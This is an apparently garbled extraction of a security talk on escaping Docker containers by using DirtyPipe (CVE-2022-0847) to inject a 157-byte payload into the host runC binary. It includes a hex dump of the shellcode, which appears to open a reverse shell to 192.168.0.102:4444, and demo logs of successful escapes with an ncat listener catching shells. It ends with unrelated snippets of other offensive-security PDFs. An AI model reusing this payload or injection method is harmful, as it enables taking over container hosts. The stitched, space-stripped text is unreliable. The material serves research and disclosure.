`whichrunc`|head-n1\n00000000:7f454c46020101000000000000000000.ELF............\nsrc: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#/media/File:Elf-layout--en.svg\nELF\n➜ ~objdump -dj '.text'`whichrunc`|sed-n'13,24p'\n0000000000232390<_start@@Base>:\n232390:\n31ed\nxor\n%ebp,%ebp\n232392:\n4989d1 mov%rdx,%r9\n232395:\n5e\npop%rsi\n232396:\n4889e2 mov%rsp,%rdx\n232399:\n4883e4f0 and$0xfffffffffffffff0,%rsp\n23239d:\n50\npush%rax\n23239e:\n54\npush%rsp\n23239f:\n4c8d056ac24600\nlea0x46c26a(%rip),%r8\n2323a6:\n488d0df3c14600\nlea0x46c1f3(%rip),%rcx\n2323ad:\n488d3d8cb40600\nlea0x6b48c(%rip),%rdi\n2323b4:\nff15167ca800\ncallq *0xa87c16(%rip)\n➜ ~cat/proc/sys/kernel/randomize_va_space\n2\n➜ ~readelf -h`whichrunc`|sed-n'1,3p;8p;11p'\nELFHeader:\nMagic:7f454c46020101000000000000000000\nClass:ELF64\nType:DYN(Sharedobjectfile)\nEntrypointaddress:0x232390\n①\n②\n1.runCPIEASLR\n2.DirtyPipeELFpayload\n1.呢模payloadEntrypointOEP\n1.runCPIE\n2.社OEP\n3.payloadOEP\n2.payload\n1.padding\n2.section(s)\n➜ ~readelf --wide--section-headers`whichrunc`|sed-n'4,9p'\n[Nr]NameTypeAddressOffSizeESFlg LkInfAl\n[0]NULL000000000000000000000000000000000\n[1].interp\nPROGBITS000000000000027000027000001c00A001\n[2].note.ABI-tag\nNOTE\n000000000000028c 00028c00002000A004\n[3].note.go.buildid NOTE\n00000000000002ac0002ac00006400A004\n[4].note.gnu.build-id NOTE\n000000000000031000031000002400A004\n➜ ~readelf --wide--program-headers`whichrunc`|sed-n'7p;12,14p'\nTypeOffsetVirtAddr\nPhysAddr\nFileSiz MemSiz Flg Align\nNOTE\n0x00028c 0x000000000000028c0x000000000000028c0x0000a80x0000a8 R0x4\n157\nbytes\nrunCver:1.0.3\nrunC\n➜ ./runc_latest -v\nrunc version1.1.1\ncommit:v1.1.0-20-g52de29d7\nspec:1.0.2-dev\ngo:go1.17.6\nlibseccomp:2.5.3\n➜ readelf --wide--program-headers./runc_latest |sed-n'7,15p'\nTypeOffsetVirtAddr\nPhysAddr\nFileSiz MemSiz Flg Align\nLOAD0x0000000x00000000004000000x00000000004000000x0004e80x0004e8R0x1000\nLOAD0x0010000x00000000004010000x00000000004010000x46e0e10x46e0e1RE0x1000\nLOAD0x4700000x00000000008700000x00000000008700000x4562e20x4562e2R0x1000\nLOAD0x8c68a80x0000000000cc78a80x0000000000cc78a80x0336c80x071948RW0x1000\nNOTE0x0002000x00000000004002000x00000000004002000x0000440x000044R0x4\nTLS0x8c68a80x0000000000cc78a80x0000000000cc78a80x0000280x000078R0x8\nGNU_STACK0x0000000x00000000000000000x00000000000000000x0000000x000000RW0x10\nGNU_RELRO0x8c68a80x0000000000cc78a80x0000000000cc78a80x0037580x003758R0x1\nrunC NOTE68\nrunC\n➜ readelf --wide--section-headers./runc_latest 2>/dev/null|sed-n'4p;6,7p;29,30p'\n[Nr]NameTypeAddressOffSizeESFlg LkInfAl\n[1].note.gnu.build-idNOTE000000000040020000020000002400A004\n[2].note.ABI-tagNOTE000000000040022400022400002000A004\n[24].go.buildinfo\nPROGBITS0000000000cdfd508ded5000002000WA0016\n[25].noptrdata\nPROGBITS0000000000cdfd808ded8001a960 00WA0032\n008DED50FF20476F206275696C64696E663A0800.Gobuildinf:..\n008DED6050C0CC0000000000A0C0CC0000000000P...............\n008DED7000000000000000000000000000000000................\n008DED80052F0A3E203A010101010A7C04050103./.>:.....|....\n008DED903C612E2F2F005C275C225C5C01020300<a.//.\\'\\\"\\\\....\n008DEDA03C703E003C7464003C7468003C683100<p>.<td.<th.<h1.\n008DEDB03C6832003C6833003C6834003C683500<h2.<h3.<h4.<h5.\n008DEDC03C6836002E2E2F00EFBFBD006E756C6C<h6.../.....null\n008DEDD000060C1200060C123C74743E3C2F613E........<tt></a>\n008DEDE0266C743B3C2F703E3C68723E3C756C3E&lt;</p><hr><ul>\n008DEDF03C6F6C3E2667743B3C646C3E3C6C693E<ol>&gt;<dl><li>\n008DEE003C64643E3C64743E3C74723E3C62723E <dd><dt><tr><br>\n008DEE103C656D3EFFFFFFFFFFFFFFFF01000000<em>............\n008DEE20FFFFFFFF08000000FFFFFFFF01000000 ................\n008DEE3008000000010000002D2D2D0A266C743B ........---.&lt;\n008DEE402667743B5C75303026616D703B000000 &gt;\\u00&amp;...\n008DEE503C64656C3E0000003C2F74743E000000<del>...</tt>...\n008DEE603C7072653E0000003C2F756C3E000000<pre>...</ul>...\n008DEE703C2F6F6C3E0000003C2F646C3E000000</ol>...</dl>...\n008DEE803C2F6C693E0000003C2F64643E000000</li>...</dd>...\n008DEE903C2F64743E0000003C2F74643E000000 </dt>...</td>...\n008DEEA03C2F74683E0000003C2F74723E000000</th>...</tr>...\n008DEEB03C2F68313E0000003C2F68323E000000</h1>...</h2>...\n008DEEC03C2F68333E0000003C2F68343E000000 </h3>...</h4>...\n--- runc\n--0x8DEEC0/0x8FA980-------------------------------------\n008DED50 505152565741534831C04883C0390F05\n008DED60 83F8007420B8F01B4000488D1D000000\n008DED70 00904881EB710D80004801C3415B5F5E\n008DED80 5A595853C3554889E54831D26A015E6A\n008DED90 025F6A29580F054883EC08C704240200\n008DEDA0 115CC7442404C0A80066488D34244883\n008DEDB0 C4085B4831DB6A105A6A035F6A2A580F\n008DEDC0 054831F6B0210F0548FFC64883FE027E\n008DEDD0 F34831C04831F648BF2F2F62696E2F73\n008DEDE0 6856574889E74831D2B03B0F05756C3E\n008DEDF03C6F6C3E2667743B3C646C3E3C6C693E\n008DEE003C64643E3C64743E3C74723E3C62723E\n008DEE103C656D3EFFFFFFFFFFFFFFFF01000000\n008DEE20FFFFFFFF08000000FFFFFFFF01000000\n008DEE3008000000010000002D2D2D0A266C743B\n008DEE402667743B5C75303026616D703B000000\n008DEE503C64656C3E0000003C2F74743E000000\n008DEE603C7072653E0000003C2F756C3E000000\n008DEE703C2F6F6C3E0000003C2F646C3E000000\n008DEE803C2F6C693E0000003C2F64643E000000\n008DEE903C2F64743E0000003C2F74643E000000\n008DEEA03C2F74683E0000003C2F74723E000000\n008DEEB03C2F68313E0000003C2F68323E000000\n008DEEC03C2F68333E0000003C2F68343E000000\n--- runc\n--0x8DEEC0/0x8FA980--------------------------\nDEMO 1 exec\n➜ ~dockerrun--rm-v`pwd`/exp:/exp-it--nameescapeubuntu:18.04/bin/bash\nroot@60adb7f4b502:/#cd/exp;./escape_with_dirtypipe_exec\n[*]exploitingDirtyPipe (CVE-2022-0847)\n[*] waitingforrunC tobeexecutedinthecontainer\n[+]runC catched:/proc/353/exe\n[+]originalentrypoint:0x401bf0\n[+]OEPinpayloadupdated\n[+] remoteIPandportinpayloadupdated\n[*]parsingrunC ELF\n[+]PT_NOTEsegment4found\n[+]section.go.buildinfo found\n[*]inject->offmod4096=0xd50\n[*]inject->secaddr mod4096=0x0\n[+]inject->secaddr +=0xd50\n[+] nop virtualaddr inpayloadupdatedto0x800d71\n[*] writingpayloadintorunC withdirtypipe\n[+]157bytespayloadinjectedat0x8ded50offsettotargetfile\n[*]updatingsectionheaderwithdirtypipe\n[+]section.go.buildinfo found\n[+]sectionheaderupdated\n[*]updatingsegmentheaderwithdirtypipe\n[+]segmentheaderupdated\n[*]updatingentrypoint to0x800d50withdirtypipe\n[+]exploitsucceeded\n➜ ~ncat -klvnp 4444\nNcat:Version7.91(https://nmap.org/ncat )\nNcat:Listeningon:::4444\nNcat:Listeningon0.0.0.0:4444\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:53425.\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:53427.\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:53428.\ncat/etc/passwd|grepvagrant\nvagrant:x:1000:1000:,,,:/home/vagrant:/usr/bin/zsh\n➜ ~dockerexec-itescape/exp/bash_evil\nERRO[0000]Nohelptopicfor'/exp/bash_evil'\n➜ ~dockerrun--rm-itubuntu:18.04hostname\nd2d8b123f631\ndockerexec盟告runC\nshell\nDEMO 2 \n➜ ~dockerrundirtypipe:escape\n[*]exploitingDirtyPipe (CVE-2022-0847)\n[+]runC openedforreadingas/proc/self/fd/3\n[+]executing/escape_with_dirtypipe_image\n[+]originalentrypoint:0x232390\n[+]OEPinpayloadupdated\n[+] remoteIPandportinpayloadupdated\n[*]parsingrunC ELF\n[+]PT_NOTE segment5found\n[+]section.go.buildinfo found\n[*]inject->offmod4096=0x3b0\n[*]inject->secaddr mod4096=0x0\n[+]inject->secaddr +=0x3b0\n[+] nop virtualaddr inpayloadupdatedto0x8003d1\n[*]writingpayloadintorunC withdirtypipe\n[+]157bytespayloadinjectedat0xacd3b0offsettotargetfile\n[*]updatingsectionheaderwithdirtypipe\n[+]section.go.buildinfo found\n[+]sectionheaderupdated\n[*] updatingsegmentheaderwithdirtypipe\n[+]segmentheaderupdated\n[*] updatingentrypoint to0x8003b0withdirtypipe\n[+]exploitsucceeded\n➜ ~ncat -klvnp 4444\nNcat:Version7.91(https://nmap.org/ncat )\nNcat:Listeningon:::4444\nNcat:Listeningon0.0.0.0:4444\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:54172.\ncat/etc/passwd|grepvagrant\nvagrant:x:1000:1000:,,,:/home/vagrant:/usr/bin/zsh\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:55044.\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:55045.\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:55046.\n➜ dirtypipe dockerrun--rm-itubuntu:18.04hostname\nd5e509321515a\ndockerexecrunC\nshell\nshell\n__attribute__((constructor))voidrun_at_link(void) {\nintrunc_fd_read =open(\"/proc/self/exe\",O_RDONLY);\n}\nlibseccomp\n①\nØ \nØ runC\nØ 👉\nØ runC\nØ CVE-2019-5736\nØ DirtyPipeCVE-2022-0185\nØ \n路在何方\n05\nTakeaways\nØ \nØ +\nØ rootless\nØ &runC\nØ &\nØ https://veritas501.github.io/2022_03_16-CVE_2022_0185pipe\nØ https://terenceli.github.io//2022/03/19/container-escape-through-dirtypipe\nØ https://dirtypipe.cm4all.com\nØ https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b\nØ https://github.com/opencontainers/runc/commit/16612d74de5f84977e50a9c8ead7f0e9e13b8628\nØ https://github.com/opencontainers/runc/commit/50a19c6ff828c58e5dab13830bd3dacde268afe5\nØ https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d\nØ https://github.com/DataDog/dirtypipe-container-breakout-poc\nØ https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/\nØ https://github.com/advisories/GHSA-gp4j-w3vj-7299\nØ https://bugzilla.suse.com/show_bug.cgi?id=1012568#c6\nØ https://seclists.org/oss-sec/2019/q1/119\nØ PracticalBinaryAnalysisbyDennisAndriesse"
pdf
2020/9/25 Linux提权姿势二:利用NFS提权 https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&tempkey=MTA4MF95ZVZHaittcHd5aEVSN0dCcmZLUkk1ekhBRi1Sb2JicDBqQ20tU… 1/6 Linux提权姿势二:利用NFS提权 如果在服务器上具有低特权shell,并且发现服务器中具有NFS共享,则可以使用它来升级特权。但是成功 取决于它的配置方式。 目录 什么是NFS? 网络文件系统(NFS)是一个客户端/服务器应用程序,它使计算机用户可以查看和选择存储和更新远程 计算机上的文件,就像它们位于用户自己的计算机上一样。在  N...
pdf
Harnessing Weapons ...of Mac Destruction WHOIS @patrickwardle repurposing !detection detection OUTLINE the idea The Idea "good hackers copy; great hackers steal" spy "a" the "lab" } captured! 
 (by spy "b") REPURPOSING MALWARE ...for personal gain spy "b" "repurposed" ...rather why not! WHY? With more resources an...
pdf
HITCON 2013 : CYBERWAR, IN HACK WE TRUST JUL. 19-20, 2013 How can I have 100 0-day for just 1-day Version : Draft Speak by R3d4l3rt 1 HITCON 2013 Introduction I. How can I found bug easily? III. Project Overview II. How can I have about one hundred vulnerability for just 1 days IV. Outline • Introduction of speaker • ...
pdf
A Journey Into Fuzzing WebAssembly Virtual Machines Patrick Ventuzelo #BHUSA  @BlackHatEvents #BHUSA @BlackHatEvents Patrick Ventuzelo (@Pat_Ventuzelo) ● Founder & CEO of FuzzingLabs | Senior Security Researcher ○ Fuzzing and vulnerability research ○ Development of security tools ● Training/Online courses ○ Rust Sec...
pdf
Gotta glitch ‘em all! 10+ Years of War Stories Glitching Embedded Devices AGENDA Introduction FI in the wild Practical FI Protections Where is the problem? const char *PIN = "19379148" // Compare the PIN with the correct one // Return true if different bool comparePIN(char *pin) { for (int i=0; i<strle...
pdf
你也配用计划任务? 高级攻防实验室 老草 前言 标题微软雅黑20号字 01 PART 前言 • 这是一篇老草的自我反思 • 核心技术点:TaskScheduler(Windows) • 关联知识点:RPC/IDL/COM/UAC/横向移动/武器化 • 请勿对号入座 你也配用计划任务API? 标题微软雅黑20号字 02 PART 你也配用计划任务API? • 正常的计划任务用法 • 抄自msdn • 按顺序十个以上必要调用 你也配用计划任务API? • 本质呢? 你也配用计划任务API? • 抓个包? 你也配用计划任务API? • 理论依据呢? • MS-TSCH 你也配用计划任务API? • 披着COM/DCOM皮的纯RPC • 本...
pdf
The future frontier of Hacking - UMTS mobile phone platform Web intrusions: the best indicator of the vulnerable status of the Internet Speaker: SyS64738 www.zone-h.org Zone-H.org Zone-H.org Zone-H.org: the Internet thermometer? Zone-H.org SECURE HACKABLE F#CKABLE Digital attacks amount since 2002 1600 1811 2341 365...
pdf
Raspberry MoCA A recipe for compromise Your Presenter Andrew Hunt Graduate student at George Mason University ahunt5@masonlive.gmu.edu The views presented in this talk do not reflect the views of my employer. It is an independent work. Media over Coaxial Alliance • A bunch of media companies got together • H...
pdf
Bypass LSA Protection 0x01 LSA Protection 1LSA & LSASS LSASS (Local Security Authority Subsystem Service Windows LSA (Local Security Authority Lsass 2LSA Protection Win8.1 LSA Lsa Protection mimikatz LSA Microsoft LSA 0x02 LSA Protection & Bypass 1 LSA Protection RunAsPPL 1 Lsass LSA Protection Lsa I...
pdf
Bypass firewalls, application white lists, secure remote desktops in 20 seconds Zoltan Balazs DEF CON 22, 2014 Hungary root@bt:~# whoami Zoltán Balázs root@bt:~# whoami root@bt:~# whoami AV testing AV bypass root@bt:~# whoami OSCP: Occasional Satire Captain Punk CISSP: Certified Interspecie-ial Sheep Shearing Profess...
pdf
© Caendra Inc. 2020 All Rights Reserved Web Application Penetration Testing eXtreme /*<EVASION>*/ S e c t i o n 0 1 | M o d u l e 0 2 WAPTXv2: Section 01, Module 02 - Caendra Inc. © 2020 Table of Contents MODULE 02 | /*<EVASION>*/ 2.1 Base64 Encoding Evasion 2.2 URI Obfuscation Techniques 2.3 JavaScript Obfuscati...
pdf
Google Toolbar: The NARC Within “The” Google What would we do without them/it? Google Toolbar: The NARC Within The problem: URLS are the geek tool? URLs, URLs everywhere... Home, work, on the go? Google Toolbar: The NARC Within Google Toolbar is the Solution? Google Toolbar: The NARC Within Or just a tease? G...
pdf
Are We Really Safe? HACKING ACCESS CONTROL SYSTEMS Dennis Maldonado u  Security Consultant @ KLC Consulting u  Twitter: @DennisMald u  Houston Locksport Co-founder http://www.meetup.com/Houston-Locksport/ u  Rebooting HAHA! (Houston Area Hackers Anonymous) Agenda u  Physical Access Control System u  Lin...
pdf
We are “into” helping others reach the security summit… Andrew Gavin : Verizon Business Michael Baucom : N2 Net Security, Inc Charles Smith : N2 Net Security, Inc Brief recap of OpenDLP Goals of new Meterpreter feature Decisions behind using OpenDLP and Metasploit Architecture and changes Architecture and change...
pdf
張善政 S-C (Simon) Chang 行政院副院長 Vice Premier Aug. 26th, 2015 Reinforcing Cyber Security -- Taiwan’s Roadmap Reinforcing Cyber Security -- Taiwan’s Roadmap  Build a comprehensive defense posture  Government wide classification and security requirements  Establish 8 CIP domains and security requirements  PP...
pdf
PSRC小目标,挣他一个亿 讲师:carry_your 138,270,000 CONTENTS 01 资产收集技巧 02 漏洞挖掘案例 03 职业规划梳理 资产收集 1 在渗透测试中,我们需要尽可能多 的去收集目标的信息,资产探测和 信息收集,决定了你发现安全漏洞 的几率有多大。如何最大化的去收 集目标范围,尽可能的收集到子域 名及相关域名的信息,这对我们进 一步的渗透测试显得尤为重要。 基本概况 IP段+端 口 域名 APP 服务号 API 信息泄露 社工 基本概况 股权结构查询 大型金融集团往往有着非常复 杂的股权结构,通过工商查询 目标集团的股权结构,更全面 的了解目标集团的公司资产, 从一个点切入可获取到集团所 有的子公司...
pdf
CVE-2022-33891: Apache Spark shell command injection vulnerability via Spark UI 影响版本 Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1. 分析 ⾸先看到官⽅描述 https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc 当中可以根据提⽰找到diff: https://github.com/apache/spark/pull/36315/file...
pdf
HACKING TRAFFIC LIGHTS DEFCON 2020 WHO ARE WE? 06/08/2020 HACKING TRAFFIC LIGHTS • Wesley Neelen • Hacker • OSCP / OSCE • 8+ years of experience • Internet of Things security • Rik van Duijn • Hacker • OSCP / OSCE • 8+ years of experience • Malware analysis DISCLAIMER: NO SMART TRAFFIC EXPERTS ☺. WE DO USE BICYCLES @W...
pdf
#BHUSA @BlackHatEvents PISE: Automatic Protocol Reverse Engineering Ron Marcovich, Orna Grumberg and Gabi Nakibly #BHUSA @BlackHatEvents Ron Marcovich M.Sc. Student Introductions Dr. Gabi Nakibly Senior Adjunct Lecturer Distinguished Researcher Formerly at Prof. Orna Grumberg Faculty Member #BHUSA @BlackHatEvents Age...
pdf
• Twitter: @Kevin2600 • Github: https://github.com/kevin2600 • 狗汪汪系列: 玩转无线电-不安全的蓝牙锁; 玩转嵌入式-I2C 协议分析; 玩转嵌入式-WINKHUB 边信道; 玩转无线电-GPS Hacking; 玩转无线电-温哥华天车 RFID 票务系统 ... 议程: • 无人机攻防那点事 • 无人机攻防案例篇 • 无人机攻防实战篇 • 无人机攻防科幻篇 无人机攻防那点事 无人机世界百家齐放 • 无人机厂商众多 (DJI; Parrot; Xiaomi; DIYer...) • 无人机运用场景广泛 (航拍; 运输; 求婚; 应急反应...) • 无人机遥控种...
pdf
Alexander Lash Outline  Disclaimers  Why I Do This  Basic Skills  “Feature” -phones  Light Modification  Heavy Modification  Smartphones  BlackBerry  Symbian  Windows Mobile  iPhone This Talk is NOT  …an endorsement  …a detailed guide  …about a particular phone  …except when it is.  …about carriers  …o...
pdf
Aggressor.main 进入相关认证工 作 cs.jar 开始运行 输出相关错误,比 如缺少验证正数等 错误 错误 成功启动相关 UI new Authorization() 开始认证 开始认证 退出程序 readFile("cobaltstrike.auth") 将数据代入 _decrypt() 进行 RSA 解密,此处使用公钥解 密 将返回的 将返回的 byte[] 步入 步入 AuthCrypto.derypt() 将公钥文件进行解 析,并计算 MD5 与指 定值进行对比 load() -> readAll("authpub.key") new AuthCrypto() cipher 生成 生成 pubkey 生成 ...
pdf
The Agricultural Data Arms Race: Exploiting a Tractor Load of Vulnerabilities In The Global Food Supply Chain. (in good faith) A man, “Using a hand tractor for cultivation. Falls City Farmsteads, Nebraska” Rothstein, Arthur, 1915- 1985, photographer (Public Domain) John Deere 7450 ProDrive Forage Harvester...
pdf
Who Controls the Past Controls the Future Who Controls the Present Controls the Past Nothing gives rest but the sincere search for truth. -Pascal Greetz from Room 101 Kenneth Geers 1984 # Nineteen Eighty-Four (Orwell) # Govt IW vs own populace # Ministry of Truth, Thought Police # Two-way telescreens # Room 101 # C...
pdf
A Journey To Protect Points Of Sale Nir Valtman, CISSP W : www.valtman.org . : @ValtmaNir Introduction 2 Photo by Bill Fraser 01/07/2014 3 01/07/2014 4 I’m an architect 5 01/07/2014 6 7 Zombies!!! 8 Defacement 9 AntiDef OPEN SOURCE Memory Scraper Secure TDD 10 Why Points Of Sale Targeted? 11 12 13 Deployment 14 15 ...
pdf
WriteUp By Nu1L Author:Nu1L WriteUp By Nu1L PWN Honorbook Reverse print mips pypy WEB babyphp Crypto RRSSAA combinelfsr rw aes_baby PWN Honorbook risc-vpwnghidra addoff-by-one 0x300xf0,overlap from pwn import * s = remote("121.36.192.114","9999") # s = process("./qemu-riscv64 -g 1234 -L ./libs ./honorbook",shell=True)...
pdf
Finding 0days in Enterprise Software Shubham Shah Hacking HCL Digital Experience also known as IBM Websphere Portal What is HCL Digital Experience / IBM Websphere Portal • Enterprise content management system. • Used by medium - large enterprises, and is a very flexible content delivery application. • Around 4.5k ...
pdf
Bug Bounty 獎金獵人甘苦談 那些年我回報過的漏洞 orange@chroot.org #Orange Tsai #CHROOT #DEVCORE #電競選手 #CTFer #Web #汪 My RCE Checklists √ Facebook √ Apple √ Yahoo √ Uber ? Google 什麼是 Bug Bounty Program ? • 在官方所提供的規則及範圍下, 讓獨立的研究人員可自由尋找系 統漏洞, 並提供對等的獎勵 小禮物 獎金 名譽(Hall of Fame) Bug Bounty 好處? 防止漏洞流入地下市場 架構大難顧及網路邊界 企業對外形象宣傳 改善社會不良風氣 How do y...
pdf
LCTF-Writeup by Nu1L Web L PLAYGROUND djdemourlssrffuzz6379 redis nginx/static../ pycflagsessiondata sessionidsessiondataflag linux0fuzz0:8000CRLF redisseturlvps302sessiondata append Simple blog swpivcbcsprintf http://211.159.161.162/test.php? submit=%E6%8F%90%E4%BA%A4&site=file%3A%2F%2Fwww.baidu.com%2F/home/lctf/flag%23 w...
pdf
#BHUSA @BlackHatEvents BrokenMesh: New Attack Surfaces of Bluetooth Mesh Han Yan, Lewei Qu, Dongxiang Ke Baidu AIoT Security Team #BHUSA @BlackHatEvents Information Classification: General About US Baidu AIoT Security Team • Focus on Android / Linux platform • Aim to discover 0day vulnerability and explore possible def...
pdf
Bypassing Android Password Manager Apps Without Root Stephan Huber, Siegfried Rasthofer, Steven Arzt Fraunhofer SIT 2 3 Stephan • Mobile Security Researcher at Fraunhofer SIT • Enjoys teaching students in Android (app) hacking • Twitter: @teamsik Siegfried • Head of Department Secure Software Engineering at Fraunh...
pdf
pwn- ctfwikihttps://wiki.x10sec.org/pwn/linux/user-mode/stackoverflow/x86/stack-intro/ ctfwikictfwiki 32 sudo apt-get install lib32z1 lib32ncurses5 unbuntu20lib32z1 1. = EBPRBP - + 48 2. callcallmv ebp+0x8 x86x64 3. 232 1n gdbpwntools socatpwn socat tcp-l:6666,fork exec:../ret2syscall,reuseaddr 6666 py gdb.attach(p...
pdf
1 CVE-OLON-OOOLS Gitlab 前台RCE 分析之 P。 接 https://t.zsxq.com/aYZzVbu 公众号: https://mp.weixin.qq.com/s? __biz=Mzg4NzcxMDgyOA==&mid=2247483654&idx=1&sn=8c0f99c646e63460d3190508613cac4 5&chksm=cf877405f8f0fd1382100c97af86db549084b987c515c848eb8a7faa92eaac7b5aeb0ac9 2ece#rd ==================================================...
pdf
1 种新型Java句话⽊⻢的实现 前⾔ 基本原理 获取脚本引擎 绑定对象 eval 基本语法 调⽤Java⽅法 导⼊Java类型 创建Java类型的数组 导⼊Java类 ⽅法调⽤与重载 Payload结构设计 语法问题的坑 两种语⾔对象间的相互转换 Rhino/Nashorn解析的差异 反射的坑 保底操作 测试 最后 @yzddMr6 ⼀直以来,Java⼀句话⽊⻢都是采⽤打⼊字节码defineClass实现的。这种⽅法的优势是可以完整的打 进去⼀个类,可以⼏乎实现Java上的所有功能。不⾜之处就是Payload过于巨⼤,并且不像脚本语⾔⼀ 样⽅便修改。并且还存在很多特征,例如继承ClassLoader,反射调⽤defineClass...
pdf
F.O.E. Feed Over Email A Proxy-less RSS Reader A Proxy-less RSS Reader http://code.google.com/p/foe-project By Sho Ho Broadcasting Board of Governors F.O.E. Who am I? Name: Sho Ho Job Title: Software Engineer Employer: Broadcasting Board of Governors Mother ship of Voice of America, Radio Free Europe/Radio Liberty, ...
pdf
The Hackers Guide to The Hackers Guide to Search and Arrest Search and Arrest by Steve Dunker J.D. by Steve Dunker J.D. I. When Can an Officer Legally I. When Can an Officer Legally ““Stop Stop”” an individual? an individual? A. Voluntary Stops A. Voluntary Stops B. Investigative Stops B. Investigative Stops ...
pdf
“WMAP: Metasploit goes Web” ET Introduction • No agenda in this presentation • No Sun Wu Tzu “The Art of War” Stuff In this presentation either. – #nomorefree-art-of-war-stuff-in-security- presentations. • No history of web scanners Introduction • Efrain Torres – 2*5+ years enjoying IT security – Metasploit team – ...
pdf
java urlconnection nat smashjava urlconnectionurl 12 ssrf302locationurl ssrf302 get ssrfapachenginx ssrfwhite spaceapachenginx nginx https://t.zsxq.com/m6YjqnE apache https://t.zsxq.com/Mz7A2Nz
pdf
Stealing The Internet An Internet-Scale Man In The Middle Attack Defcon 16, Las Vegas, NV - August 10th, 2008 Alex Pilosov – Pure Science Chairman of IP Hijacking BOF ex-moderator of NANOG mailing list alex@pilosoft.com Tony Kapela – Public Speaking Skills CIO of IP Hijacking BOF tk@5ninesdata.com Why Should You Car...
pdf
1 保护应用程序和 API 销售演练:检查清单 Web 应用程序和 API 保护功能检查清单 在规划、实施或优化信息安全策略的同时部署 Web 应用程序和 API 安全解决方案,让您的企业获得理解独有风 险、识别安全漏洞和检测威胁的强大能力。您需要的是这样一种 Web 应用程序和 API 保护 (WAAP) 解决方案 - 它能够提供持续的监测能力和综合全面的见解,还具有识别和阻止大部分复杂攻击的全面能力。 这份检查清单可用于评估供应商能力,也可以用作实施有效的 WAAP 解决方案时需要满足的需求列表。 类别 1:平台需求 企业的类型和规模林林总总,并且具有不同水平的需求。您的 Web 应用程序安全解决方案应该灵活、 可扩展,并且易...
pdf